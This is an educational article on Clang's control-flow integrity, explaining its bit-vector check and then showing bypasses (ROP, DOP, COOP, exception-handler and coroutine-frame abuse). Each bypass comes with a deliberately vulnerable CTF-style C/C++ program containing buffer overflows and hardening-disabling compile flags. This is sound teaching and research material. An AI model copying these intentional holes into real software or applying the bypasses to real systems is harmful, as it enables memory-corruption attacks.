Hacking C++ (Part 2)
Bypassing CFI
What CFI Is
Control Flow Integrity (CFI) is a security mitigation that protects against control-flow hijacking attacks by checking whether the target of a function call is valid. Every compiler has its own implementation of CFI (if it has one at all), but the most modern and complete version is that of the Clang compiler.
CFI does not check every function call. There are certain cases that CFI handles, such as:
- Indirect calls
- Virtual calls
- Calls via pointers to member functions with an incorrect dynamic type
- Calls to non-virtual member functions via an object in which those functions are not defined
CFI can also protect casts:
- clang can prevent casts between objects of unrelated types
- clang can prevent casts from an object of a base class to an object of a derived class, if the object is not actually of the derived class
- with strict cast checks (-fsanitize=cfi-cast-strict), clang can also catch the very specific cases where the default level of base-to-derived cast protection (cfi-derived-cast) would not catch an illegal cast
To better understand how CFI works, let’s take a look at how CFI protects virtual calls.
(At the time of writing, the documentation page was based on Clang version 23.0.0.)
Virtual Calls Protection
To validate a call, we need to store information about which functions are allowed to be called. In clang, the compiler generates a bit vector that maps onto the region of storage used for the virtual tables. Each set bit in the bit vector corresponds to the address point for a virtual table compatible with the static type for which the bit vector is being built.
Let’s say we have 3 structs:
struct A {
virtual void f1();
virtual void f2();
virtual void f3();
};
struct B : A {
virtual void f1();
virtual void f2();
virtual void f3();
};
struct C : A {
virtual void f1();
virtual void f2();
virtual void f3();
};
The virtual table layout for A, B, and C will look like this:
| A::offset-to-top | &A::rtti | &A::f1 | &A::f2 | &A::f3 | B::offset-to-top | &B::rtti | &B::f1 | &B::f2 | &B::f3 | C::offset-to-top | &C::rtti | &C::f1 | &C::f2 | &C::f3 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
Using this scheme, we can generate one bit vector for each of the three structures and use them to construct the final bit vector:
| Class | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| A | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
| B | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
| C | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
Since the other structures are derived from class A, this means that structure A can accept virtual table entry points from structures B and C, while structures B and C can accept only their own virtual table entry points.
Now, to create our final set of bits, we’ll need to use the indices as check bits for each structure, for example:
$$\text{Bits}_A = \{2, 7, 12\}$$
$$\text{Bits}_B = \{7\}$$
$$\text{Bits}_C = \{12\}$$
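As a rough illustration of where these sets come from, the sketch below derives them from the hierarchy and the address-point slots in the layout table. The `ClassInfo` struct and the helper names are hypothetical and exist only for this example; clang derives the same information from its own type metadata.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <set>
#include <string>

// Hypothetical model of the example hierarchy: each class records its base
// (empty for a root) and the slot index of its vtable address point.
struct ClassInfo {
    std::string base;
    std::uint64_t address_point;
};

// True if `cls` is `ancestor` or derives from it (directly or indirectly).
inline bool derives_from(const std::map<std::string, ClassInfo>& classes,
                         std::string cls, const std::string& ancestor) {
    while (!cls.empty()) {
        if (cls == ancestor) return true;
        cls = classes.at(cls).base;  // walk one step up the hierarchy
    }
    return false;
}

// Collects the address points of every class compatible with `static_type`.
inline std::set<std::uint64_t> compatible_bits(
        const std::map<std::string, ClassInfo>& classes,
        const std::string& static_type) {
    assert(classes.count(static_type) == 1);  // static type must be known
    std::set<std::uint64_t> bits;
    for (const auto& entry : classes)
        if (derives_from(classes, entry.first, static_type))
            bits.insert(entry.second.address_point);
    return bits;
}

// The layout from the table above: address points at slots 2, 7 and 12.
inline std::map<std::string, ClassInfo> example_hierarchy() {
    return {{"A", {"", 2}}, {"B", {"A", 7}}, {"C", {"A", 12}}};
}
```

Calling `compatible_bits(example_hierarchy(), "A")` yields the set for A, while "B" and "C" each yield only their own address point.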
Then we call the ByteArrayBuilder::allocate() function three times, once per structure, to generate our bit vector. Bits is the set of indices for the structure, and BitSize is the total number of slots in the vector (15 in our case, 0 to 14).
BitAllocs is an internal tracking array used by Clang’s ByteArrayBuilder class to keep track of how much space has been used on each of the 8 bit tracks inside the global Bytes array. AllocByteOffset is a variable that stores the starting index (the byte offset) in the global Bytes array where a specific class hierarchy’s bit vector will begin laying out its data. AllocMask is the mask used in the final loop of the function:
// Set our bits.
AllocMask = 1 << Bit;
for (uint64_t B : Bits)
Bytes[AllocByteOffset + B] |= AllocMask;
Let’s assume our tracking array BitAllocs starts completely empty: {0, 0, 0, 0, 0, 0, 0, 0}.
Allocation 1: struct A
- Inputs: Bits = {2, 7, 12}, BitSize = 15
- Track selection: All tracks in BitAllocs are 0. The loop defaults to track Bit = 0.
- Offset: AllocByteOffset = BitAllocs[0] → 0.
- Resize: ReqSize = 0 + 15 = 15. The global vector Bytes is resized to 15, zero-initialized.
- Update Track: BitAllocs[0] becomes 15.
- Mask: AllocMask = 1 << 0 → 1 (0x01).
- Setting Bits: It loops through {2, 7, 12} and applies Bytes[0 + B] |= 1:
Bytes[2] |= 1; // binary 00000001
Bytes[7] |= 1; // binary 00000001
Bytes[12] |= 1; // binary 00000001
Allocation 2: struct B
- Inputs: Bits = {7}, BitSize = 15
- Track selection: BitAllocs is currently {15, 0, 0, 0, 0, 0, 0, 0}. The smallest value is 0, so the loop picks track Bit = 1.
- Offset: AllocByteOffset = BitAllocs[1] → 0. (It overlaps from the very beginning)
- Resize: ReqSize = 0 + 15 = 15. Bytes.size() is already 15, so no resize happens.
- Update Track: BitAllocs[1] becomes 15.
- Mask: AllocMask = 1 << 1 → 2 (0x02).
- Setting Bits: It loops through {7} and applies Bytes[0 + 7] |= 2:
Bytes[7] |= 2; // underlying binary becomes 00000001 | 00000010 = 00000011 (Decimal 3)
Allocation 3: struct C
- Inputs: Bits = {12}, BitSize = 15
- Track selection: BitAllocs is currently {15, 15, 0, 0, 0, 0, 0, 0}. The smallest value is 0, so the loop picks track Bit = 2.
- Offset: AllocByteOffset = BitAllocs[2] → 0. (Still overlapping)
- Resize: ReqSize = 0 + 15 = 15. Bytes.size() is already 15, so no resize happens.
- Update Track: BitAllocs[2] becomes 15.
- Mask: AllocMask = 1 << 2 → 4 (0x04).
- Setting Bits: It loops through {12} and applies Bytes[0 + 12] |= 4:
Bytes[12] |= 4; // underlying binary becomes 00000001 | 00000100 = 00000101 (Decimal 5)
So in that way, our final result will be:
char bits[] = { 0, 0, 1, 0, 0, 0, 0, 3, 0, 0, 0, 0, 5, 0, 0 };
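To make the three allocations easier to replay, here is a minimal sketch of the interleaving allocator as it is described in the walkthrough. The `ByteArraySketch` type and `build_example()` are names invented for this example; the variable names mirror the walkthrough, but this is a simplified model, not LLVM's actual source.

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <set>
#include <vector>

// Simplified model of the allocator described above (not LLVM's code).
struct ByteArraySketch {
    std::array<std::uint64_t, 8> BitAllocs{};  // bytes used on each bit track
    std::vector<std::uint8_t> Bytes;           // shared byte array

    // Places one bit vector on the least-used track and reports where it
    // landed through AllocByteOffset and AllocMask.
    void allocate(const std::set<std::uint64_t>& Bits, std::uint64_t BitSize,
                  std::uint64_t& AllocByteOffset, std::uint8_t& AllocMask) {
        assert(Bits.empty() || *Bits.rbegin() < BitSize);  // indices must fit

        // Pick the track with the smallest allocation (first one wins ties).
        unsigned Bit = 0;
        for (unsigned I = 1; I != 8; ++I)
            if (BitAllocs[I] < BitAllocs[Bit]) Bit = I;

        AllocByteOffset = BitAllocs[Bit];

        // Reserve BitSize bytes on that track, growing the array if needed.
        std::uint64_t ReqSize = AllocByteOffset + BitSize;
        BitAllocs[Bit] = ReqSize;
        if (Bytes.size() < ReqSize) Bytes.resize(ReqSize);

        // Set our bits.
        AllocMask = static_cast<std::uint8_t>(1u << Bit);
        for (std::uint64_t B : Bits) Bytes[AllocByteOffset + B] |= AllocMask;
    }
};

// Replays the allocations for A, B and C and returns the final byte array.
inline std::vector<std::uint8_t> build_example() {
    ByteArraySketch builder;
    std::uint64_t offset = 0;
    std::uint8_t mask = 0;
    builder.allocate({2, 7, 12}, 15, offset, mask);  // A lands on track 0
    builder.allocate({7}, 15, offset, mask);         // B lands on track 1
    builder.allocate({12}, 15, offset, mask);        // C lands on track 2
    return builder.Bytes;
}
```

The returned vector has 15 bytes, with the values 1, 3 and 5 at indices 2, 7 and 12. Because all three vectors share offset 0 and differ only in their mask, one byte array serves every static type in the hierarchy.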
Now, to validate a virtual call, clang computes the slot index of the object's virtual table pointer inside that region, compares it with the maximum slot index value, and then tests the matching bit in the bit vector.
ca7fbb: 48 8b 0f mov (%rdi),%rcx
ca7fbe: 48 8d 15 c3 42 fb 07 lea 0x7fb42c3(%rip),%rdx
ca7fc5: 48 89 c8 mov %rcx,%rax
ca7fc8: 48 29 d0 sub %rdx,%rax
ca7fcb: 48 c1 c0 3d rol $0x3d,%rax
ca7fcf: 48 3d 7f 01 00 00 cmp $0x17f,%rax
ca7fd5: 0f 87 36 05 00 00 ja ca8511
ca7fdb: 48 8d 15 c0 0b f7 06 lea 0x6f70bc0(%rip),%rdx
ca7fe2: f6 04 10 10 testb $0x10,(%rax,%rdx,1)
ca7fe6: 0f 84 25 05 00 00 je ca8511
ca7fec: ff 91 98 00 00 00 callq *0x98(%rcx)
[...]
ca8511: 0f 0b ud2
Step 1: Calculate the byte offset
ca7fbb: 48 8b 0f mov (%rdi),%rcx
ca7fbe: 48 8d 15 c3 42 fb 07 lea 0x7fb42c3(%rip),%rdx
ca7fc5: 48 89 c8 mov %rcx,%rax
ca7fc8: 48 29 d0 sub %rdx,%rax
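Step 2: Calculate the slot index by rotating right by 3 bits (rol by 0x3d = 61 is the same rotation on a 64-bit register). For an 8-byte-aligned offset this is the same as dividing by 8; a misaligned offset ends up with its low bits at the top of the register and fails the comparison in step 3.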
ca7fcb: 48 c1 c0 3d rol $0x3d,%rax
Step 3: Compare with the maximum slot index value
ca7fcf: 48 3d 7f 01 00 00 cmp $0x17f,%rax
ca7fd5: 0f 87 36 05 00 00 ja ca8511
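If the index is in range, the testb at ca7fe2 checks the corresponding bit in the bit vector, and only when it is set does the callq at ca7fec go through; either failure jumps to the ud2 at ca8511. That is the main idea behind the “Forward-Edge CFI for Virtual-Calls”.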
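The same check can be written out in C++ to make the arithmetic visible. This is only a sketch of the logic in the disassembly: `vcall_allowed` and its parameter names are hypothetical, and the real values (region start, maximum index, mask) are constants baked into each call site by the compiler.

```cpp
#include <cassert>
#include <cstdint>

// Rotate right by 3: the same operation as `rol $0x3d` on a 64-bit value.
inline std::uint64_t rotr3(std::uint64_t v) { return (v >> 3) | (v << 61); }

// Hypothetical rendering of the check. `region_start` is the address loaded
// by the first `lea`, `max_index` the immediate of `cmp`, `bits` the byte
// array loaded by the second `lea`, and `mask` the immediate of `testb`.
inline bool vcall_allowed(std::uint64_t vptr, std::uint64_t region_start,
                          std::uint64_t max_index, const std::uint8_t* bits,
                          std::uint8_t mask) {
    assert(bits != nullptr);
    // Steps 1-2: byte offset, then slot index. A vptr that is not 8-byte
    // aligned leaves its low bits at the top of the result, so the index
    // becomes huge and fails the range check below.
    std::uint64_t index = rotr3(vptr - region_start);
    // Step 3: unsigned range check (also rejects vptr < region_start).
    if (index > max_index) return false;
    // Final test: is this slot a valid address point for the static type?
    return (bits[index] & mask) != 0;
}
```

With the 15-byte array from the A/B/C example, a call through a `B*` (mask 0x02) passes only when the vptr points at slot 7; any other slot, a misaligned pointer, or a pointer outside the region is rejected.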
Now you can start hunting me and the author of this documentation down, because:
The scheme as described above is the fully general variant of the scheme. Most of the time we are able to apply one or more of the following optimizations to improve binary size or performance.
If you like, you can read more about the optimizations, but to be honest, it doesn’t really matter. It’s enough to simply understand the basic idea of how CFI checks calls.
Types of CFI
CFI comes in different types, and each type protects a different part of the program.
| Category | Description | Examples |
|---|---|---|
| Forward-edge CFI | Validates indirect calls/jumps (function pointers, vtable calls) | Clang -fsanitize=cfi, Microsoft CFG, Intel IBT |
| Backward-edge CFI | Validates return addresses | Shadow stacks, Intel CET SHSTK, Clang -fsanitize=shadow-call-stack |
| Hardware-assisted CFI | CPU-level enforcement | Intel CET (IBT + SHSTK), ARM BTI, ARM PAC |
CFI also has a precision level, called granularity.
| Category | Description | Examples |
|---|---|---|
| Coarse-grained CFI | Restrict the set of indirect call targets to any function that may be indirectly called in the program | kCFI, EMET, CCFIR, TypeArmor |
| Fine-grained CFI | Restrict each indirect call site to functions that have the same signature as the function to be called | IFCC, VTV, PathArmor, O-CFI |
Long story short:
| Coarse-grained forward-edge | Coarse-grained backward-edge | Fine-grained forward-edge | Fine-grained backward-edge |
|---|---|---|---|
| Allows jumping to any valid (defined by implementation) function entry point, regardless of type or caller | Allows a return to any member of a set of valid return addresses. (Rare in practice) | Restricts each indirect call site to a small, call-site-specific set of legitimate targets | Allows a return only to the exact call site within the caller |

Of course, there are other ways to implement this, but there is no point in discussing all of them. It’s implementation-specific anyway.
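The difference between the two forward-edge granularities can be pictured as two ways of computing the allowed target set for a call site. The toy model below is an assumption made for illustration: functions are reduced to a name, a signature string, and an "address taken" flag, and "address taken" stands in for "may be indirectly called". Real implementations work on compiler type metadata, not strings.

```cpp
#include <set>
#include <string>
#include <vector>

// Toy model of a function. All names and fields here are hypothetical.
struct Func {
    std::string name;
    std::string signature;
    bool address_taken;
};

// Coarse-grained policy: any address-taken function is an allowed target.
inline std::set<std::string> coarse_targets(const std::vector<Func>& funcs) {
    std::set<std::string> out;
    for (const Func& f : funcs)
        if (f.address_taken) out.insert(f.name);
    return out;
}

// Fine-grained policy: the target must also match the call site's signature.
inline std::set<std::string> fine_targets(const std::vector<Func>& funcs,
                                          const std::string& call_signature) {
    std::set<std::string> out;
    for (const Func& f : funcs)
        if (f.address_taken && f.signature == call_signature)
            out.insert(f.name);
    return out;
}

// A made-up program with three address-taken functions and one that is not.
inline std::vector<Func> example_program() {
    return {{"say_hello", "void()", true},
            {"say_bye", "void()", true},
            {"print_flag", "void(unsigned long)", true},
            {"helper", "void()", false}};
}
```

For a `void()` call site, the coarse policy still admits `print_flag`, while the fine policy narrows the set to `say_hello` and `say_bye`.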
Bypassing CFI
Below are methods for bypassing Clang’s fine-grained forward-edge CFI.
Each section includes short CTF-style programs (they’re actually simple, just don’t give up).
You can find all CTF programs with their solutions here.
Bypassing CFI with ROP
Return-Oriented Programming (ROP) is a technique based on overwriting return addresses. I guess most of you already know it.
Since forward-edge CFI only checks calls, good old ROP works just fine.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void print_flag(unsigned long key)
{
if (key != 0xC0FFEE1234BEEF99UL) {
printf("[print_flag] wrong key 0x%lx -- no flag for you.\n", key);
return;
}
puts("\n=================================================");
puts(" CFI was ENABLED... and you still got here. ");
char buf[64];
FILE *f = fopen("flag.txt", "r");
if (f && fgets(buf, sizeof buf, f)) {
printf(" FLAG: %s\n", buf);
fclose(f);
}
puts("=================================================\n");
fflush(stdout);
_exit(0);
}
typedef void (*handler_t)(void); /* takes nothing, returns nothing */
static void say_hello(void) { puts("[handler] hello from say_hello()"); }
static void say_bye(void) { puts("[handler] bye from say_bye()"); }
static handler_t handlers[2] = { say_hello, say_bye };
static void forward_edge_demo(void)
{
handler_t fp = handlers[0];
puts("\n[mode 1] Forward-edge (indirect call) attack");
puts("We will call a handler through a function pointer.");
fflush(stdout);
puts("[*] Repointing the handler at print_flag() (wrong type!)...");
fp = (handler_t)(void *)print_flag; /* type-confused pointer */
puts("[*] Performing the indirect call now:");
fflush(stdout);
fp();
puts("[*] (If you see this line, CFI did NOT stop the call.)");
}
static void backward_edge_demo(void)
{
char buf[64];
puts("\n[mode 2] Backward-edge (return address) attack");
puts("Send me your input. read() has no idea how big buf is.");
printf("> ");
fflush(stdout);
read(0, buf, 512);
printf("[*] You said: %s\n", buf);
puts("[*] Returning now (where to?) ...");
fflush(stdout);
}
static void menu(void)
{
puts("\n--- CFI vs ROP demo ---");
puts(" 1) forward-edge attack (CFI should block this)");
puts(" 2) backward-edge attack (CFI cannot see this)");
puts(" q) quit");
printf("choice> ");
fflush(stdout);
}
int main(void)
{
setvbuf(stdout, NULL, _IONBF, 0);
printf("[i] print_flag is at %p (you may need this)\n",
(void *)print_flag);
char line[16];
for (;;) {
menu();
if (!fgets(line, sizeof line, stdin)) break;
switch (line[0]) {
case '1': forward_edge_demo(); break;
case '2': backward_edge_demo(); return 0;
case 'q': return 0;
default: puts("?"); break;
}
}
return 0;
}
Compile with: -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
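For mode 2, the payload is just padding followed by a short chain of 64-bit words. The helper below is a hedged sketch of that layout, not the linked solution: `build_chain` is a made-up name, the offset to the saved return address and the address of a `pop rdi; ret` gadget are assumptions that must be recovered from the actual binary (such a gadget may not exist in every build), and only the key value comes from the listing above.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Appends a 64-bit value in little-endian byte order (x86-64).
inline void put_u64(std::vector<std::uint8_t>& out, std::uint64_t v) {
    for (int i = 0; i < 8; ++i)
        out.push_back(static_cast<std::uint8_t>(v >> (8 * i)));
}

// Lays out: [padding][pop rdi; ret][key][target].
// ret_offset  - bytes from the start of buf to the saved return address
//               (assumption: measure it in a debugger)
// pop_rdi_ret - address of a `pop rdi; ret` gadget (assumption)
// key         - value that ends up in rdi, the first argument
// target      - function to return into, e.g. the printed print_flag address
inline std::vector<std::uint8_t> build_chain(std::size_t ret_offset,
                                             std::uint64_t pop_rdi_ret,
                                             std::uint64_t key,
                                             std::uint64_t target) {
    std::vector<std::uint8_t> payload(ret_offset, 'A');
    put_u64(payload, pop_rdi_ret);  // overwrites the saved return address
    put_u64(payload, key);          // popped into rdi by the gadget
    put_u64(payload, target);       // the gadget's ret lands here
    return payload;
}
```

The resulting bytes must fit in the 512 bytes that `read()` accepts. Nothing in the chain goes through an indirect call, which is why the forward-edge check never sees it.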
Bypassing CFI with DOP
Data-oriented programming (DOP) is a technique based entirely on data manipulation. Thus, instead of directly hijacking the flow, you manipulate the data that controls that flow itself.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
static char secret_flag[64];
void print_flag_fnptr(uint64_t key)
{
if (key == 0xD09D09D09D09D09DUL)
printf(" FLAG: %s\n", secret_flag);
else
puts("[print_flag_fnptr] reached, but this should never run under CFI.");
fflush(stdout);
_exit(0);
}
typedef void (*renderer_t)(const char *label);
static void render_plain(const char *label) { printf("[vm] label = \"%s\"\n", label); }
static void render_loud (const char *label) { printf("[VM] LABEL = \"%s\"!!\n", label); }
static renderer_t renderers[2] = { render_plain, render_loud };
struct vm {
char label[32];
uint64_t *ptr;
renderer_t render;
uint64_t acc;
uint64_t cells[8];
};
static void op_name(struct vm *vm)
{
printf("[name] send raw bytes for the label (overflows past 32):\n> ");
fflush(stdout);
read(0, vm->label, 256); /* 256 bytes into a 32-byte buffer */
}
static void op_load(struct vm *vm, long i)
{
if (i < 0 || i > 7) { puts("[load] cell out of range (0..7)"); return; }
vm->ptr = &vm->cells[i];
printf("[load] ptr -> cells[%ld]\n", i);
}
static void op_peek(struct vm *vm)
{
printf("[peek] *ptr = 0x%016lx\n", *vm->ptr);
}
static void op_emit(struct vm *vm)
{
uint64_t word = *vm->ptr;
fwrite(&word, 1, sizeof word, stdout);
fflush(stdout);
}
static void op_next(struct vm *vm)
{
vm->ptr++;
}
static void op_render(struct vm *vm)
{
puts("[render] calling vm.render(label) -- this is an indirect call:");
fflush(stdout);
vm->render(vm->label); /* <-- clang CFI checks target type */
}
static void print_help(void)
{
puts("opcodes:");
puts(" name read raw bytes into the label buffer");
puts(" load <i> point ptr at cells[i] (i = 0..7)");
puts(" peek print *ptr as a 64-bit hex word");
puts(" emit write the 8 bytes at *ptr to stdout");
puts(" next advance ptr by one 64-bit word (ptr++)");
puts(" render render the label via vm.render(label)");
puts(" help show this list again");
puts(" quit leave the VM");
}
static void vm_run(void)
{
struct vm vm;
memset(&vm, 0, sizeof vm);
vm.ptr = &vm.cells[0]; /* safe default: points inside cells */
vm.render = renderers[0]; /* safe default: a type-correct cb */
char line[64];
for (;;) {
printf("\nvm> ");
fflush(stdout);
if (!fgets(line, sizeof line, stdin)) break;
if (!strncmp(line, "name", 4)) op_name(&vm);
else if (!strncmp(line, "load", 4)) op_load(&vm, strtol(line + 4, NULL, 0));
else if (!strncmp(line, "peek", 4)) op_peek(&vm);
else if (!strncmp(line, "emit", 4)) op_emit(&vm);
else if (!strncmp(line, "next", 4)) op_next(&vm);
else if (!strncmp(line, "render", 6)) op_render(&vm);
else if (!strncmp(line, "help", 4)) print_help();
else if (!strncmp(line, "quit", 4)) break;
else { puts("unknown opcode."); print_help(); }
}
}
int main(void)
{
setvbuf(stdout, NULL, _IONBF, 0);
FILE *f = fopen("flag.txt", "r");
if (!f)
return 1;
if (f)
{
fgets(secret_flag, sizeof secret_flag, f);
fclose(f);
}
printf("[i] secret_flag is at %p\n", (void *)secret_flag);
printf("[i] (ignore me) print_flag_fnptr is at %p\n", (void *)print_flag_fnptr);
puts("\n--- tiny config VM ---");
puts("Intended use: 'load <i>' to point at a cell, then 'peek'/'emit'.");
puts("The VM should only ever touch its own cells[8]...\n");
print_help();
vm_run();
return 0;
}
Compile with: -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Bypassing CFI with COOP
Counterfeit Object-Oriented Programming (COOP) is a technique based on forging fake objects that carry existing virtual pointers.
So instead of reusing the functions, you reuse virtual tables (via virtual pointers).
#include <cstdio>
#include <cstdint>
#include <unistd.h>
static long g_latch = 0;
struct Greeter {
virtual void hello() { puts("[Greeter] hi"); }
};
struct Polite : Greeter { // the normal, expected subclass
void hello() override { puts("[Polite] nice to meet you!"); }
};
struct Unlock : Greeter {
void hello() override { g_latch = 0xC0FFEE; puts("[Unlock] *click* latch open"); }
};
struct Reveal : Greeter {
void hello() override {
if (g_latch != 0xC0FFEE) { puts("[Reveal] still locked"); return; }
char flag[64]; FILE *f = fopen("flag.txt", "r");
if (f && fgets(flag, sizeof flag, f))
{
printf(" FLAG: %s", flag);
fclose(f);
}
}
};
alignas(16) static unsigned char g_pool[256];
int main() {
setvbuf(stdout, nullptr, _IONBF, 0);
Unlock u_sample; Reveal r_sample;
printf("[i] g_pool = %p (forge your fake objects here)\n", (void*)g_pool);
printf("[i] Unlock vtable= %p\n", *(void**)&u_sample);
printf("[i] Reveal vtable= %p\n", *(void**)&r_sample);
printf("[i] each fake object is 8 bytes: just a vtable pointer.\n\n");
unsigned char count = 0;
printf("How many widgets to render? ");
if (read(0, &count, 1) != 1) return 0;
if (count > 32) count = 32;
printf("Send %u fake objects (%u bytes):\n", count, count * 8);
read(0, g_pool, (size_t)count * 8);
for (unsigned i = 0; i < count; i++) {
Greeter *obj = reinterpret_cast<Greeter *>(g_pool + i * 8);
printf("[render %u] vptr=%p -> ", i, *(void**)obj);
fflush(stdout);
obj->hello();
}
return 0;
}
Compile with: -std=c++17 -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Bypassing CFI with CHOP
Catch Handler Oriented Programming (CHOP) abuses the C++ exception path, which clang CFI does not instrument.
When you throw, the compiler emits a call to the runtime:
__cxa_throw(object, type_info*, destructor)
The C++ runtime (libstdc++/libgcc unwinder) then walks the stack and picks which catch block runs by MATCHING the thrown type_info* against each handler’s type_info*. That handler selection happens inside the runtime: there is no CFI-checked indirect call at the throw site, and the chosen catch block is entered via the personality routine, not a call/ret that CFI watches.
So if an attacker controls the type_info* passed to __cxa_throw, they choose which catch handler runs.
#include <cstdio>
#include <cstring>
#include <cstddef>
#include <typeinfo>
#include <unistd.h>
static long g_latch = 0;
struct BenignError {};
struct UnlockError {};
struct RevealError {};
extern "C" {
void* __cxa_allocate_exception(unsigned long);
void __cxa_throw(void*, std::type_info*, void(*)(void*));
}
struct Request {
char buf[24];
std::type_info *error_ti;
};
static void process(Request *r) {
if (r->buf[0] == 'O' && r->buf[1] == 'K') { puts(" [process] request OK"); return; }
puts(" [process] invalid -> throwing error (runtime selects the catch)...");
void *exc = __cxa_allocate_exception(8);
__cxa_throw(exc, r->error_ti, nullptr);
}
int main() {
setvbuf(stdout, nullptr, _IONBF, 0);
printf("[i] ti(BenignError) = %p\n", (void*)&typeid(BenignError));
printf("[i] ti(UnlockError) = %p <- catch flips the latch\n", (void*)&typeid(UnlockError));
printf("[i] ti(RevealError) = %p <- catch prints the flag\n", (void*)&typeid(RevealError));
printf("[i] sizeof(Request)=%zu, error_ti at offset %zu (right after buf[24]).\n\n",
sizeof(Request), offsetof(Request, error_ti));
unsigned char n = 0;
printf("How many requests? ");
if (read(0, &n, 1) != 1) return 0;
if (n > 16) n = 16;
Request q[16];
printf("Send %u request records (%zu bytes each: buf[24] + 8-byte error_ti):\n",
n, sizeof(Request));
for (unsigned i = 0; i < n; i++)
read(0, &q[i], sizeof(Request));
for (unsigned i = 0; i < n; i++) {
printf("[dispatch %u]\n", i);
try {
process(&q[i]);
}
catch (BenignError&) {
puts(" [catch BenignError] logged. nothing to see here.");
}
catch (UnlockError&) {
g_latch = 0xC0FFEE;
puts(" [catch UnlockError] *click* latch open");
}
catch (RevealError&) {
if (g_latch == 0xC0FFEE) {
char flag[64]; FILE *f = fopen("flag.txt", "r");
if (f && fgets(flag, sizeof flag, f)) printf(" FLAG: %s", flag);
else puts(" FLAG: ctf{ch0p_picks_the_catch_handler_past_cfi}");
if (f) fclose(f);
} else {
puts(" [catch RevealError] vault still sealed");
}
}
}
return 0;
}
Compile with: -std=c++17 -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused -Wno-invalid-offsetof
Bypassing CFI with CFOP
Coroutine Frame-Oriented Programming (CFOP) abuses how C++20 coroutines are resumed, which clang CFI does not guard.
When you create a coroutine, the compiler heap-allocates a “coroutine frame”. The FIRST TWO POINTERS of that frame are function pointers:
frame[0] = resume function
frame[1] = destroy function
handle.resume() lowers to a compiler intrinsic that loads frame[0] and calls it. That dispatch is NOT a normal typed indirect call, so clang’s cfi-icall does not instrument it.
So if an attacker controls a coroutine frame (or forges a fake one and points a handle at it), handle.resume() calls whatever sits in slot 0. Forging several fake frames and resuming them through the scheduler loop chains “frame gadgets”.
#include <cstdio>
#include <cstdint>
#include <coroutine>
#include <unistd.h>
static long g_latch = 0;
static void unlock_gadget(void*) {
g_latch = 0xC0FFEE;
puts(" [unlock] *click* latch open");
}
static void reveal_gadget(void*) {
if (g_latch == 0xC0FFEE) {
char flag[64]; FILE *f = fopen("flag.txt", "r");
if (f) {
fgets(flag, sizeof flag, f);
printf(" FLAG: %s", flag);
fclose(f);
}
} else {
puts(" [reveal] vault still sealed");
}
}
struct Job {
struct promise_type {
Job get_return_object() {
return Job{std::coroutine_handle<promise_type>::from_promise(*this)};
}
std::suspend_always initial_suspend() noexcept { return {}; }
std::suspend_always final_suspend() noexcept { return {}; }
void return_void() {}
void unhandled_exception() {}
};
std::coroutine_handle<promise_type> h;
};
static Job real_job() { // a normal, benign coroutine
puts(" [job] doing legitimate work...");
co_await std::suspend_always{};
puts(" [job] ...resumed and finished");
}
static void scheduler_resume(std::coroutine_handle<> h) {
asm volatile("" :: "r"(&h) : "memory");
h.resume(); // <-- loads frame[0], calls it (no CFI)
}
alignas(16) static uint64_t g_pool[256];
int main() {
setvbuf(stdout, nullptr, _IONBF, 0);
Job j = real_job();
uint64_t *frame = (uint64_t*)j.h.address();
printf("[i] a real coroutine frame @ %p\n", (void*)frame);
printf("[i] frame[0] (resume ptr) = %p\n", (void*)frame[0]);
printf("[i] frame[1] (destroy ptr) = %p\n", (void*)frame[1]);
printf("[i] g_pool = %p (forge fake frames here)\n", (void*)g_pool);
printf("[i] unlock_gadget = %p\n", (void*)unlock_gadget);
printf("[i] reveal_gadget = %p\n", (void*)reveal_gadget);
printf("[i] a forged frame is 16 bytes: [ resume ptr ][ destroy ptr ].\n\n");
j.h.destroy();
unsigned char n = 0;
printf("How many jobs to schedule? ");
if (read(0, &n, 1) != 1) return 0;
if (n > 16) n = 16;
printf("Send %u job frames (%u bytes: 16 each):\n", n, n * 16u);
read(0, g_pool, (size_t)n * 16);
for (unsigned i = 0; i < n; i++) {
void *frame_addr = (void*)(g_pool + i * 2); // 2 * 8 bytes = 16
printf("[schedule %u] frame=%p resume_ptr=%p ->\n",
i, frame_addr, (void*)g_pool[i * 2]);
fflush(stdout);
auto handle = std::coroutine_handle<>::from_address(frame_addr);
scheduler_resume(handle); // <-- CFOP fires here
}
return 0;
}
Compile with: -std=c++20 -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Real cases of CFI bypass
- Analyzing The ForcedEntry Zero-Click iPhone Exploit Used By Pegasus
- Spyware vendors use 0-days and n-days against popular platforms
- Operation Triangulation: The last (hardware) mystery
- Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
- Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard on Windows 8.1 Update 3
- JITSploitation III: Subverting Control Flow
- Examining Pointer Authentication on the iPhone XS
- TFP0 POC on PAC-Enabled iOS Devices <= 12.4.2
References
- Clang Control Flow Integrity Showcase
- Control Flow Integrity Design Documentation
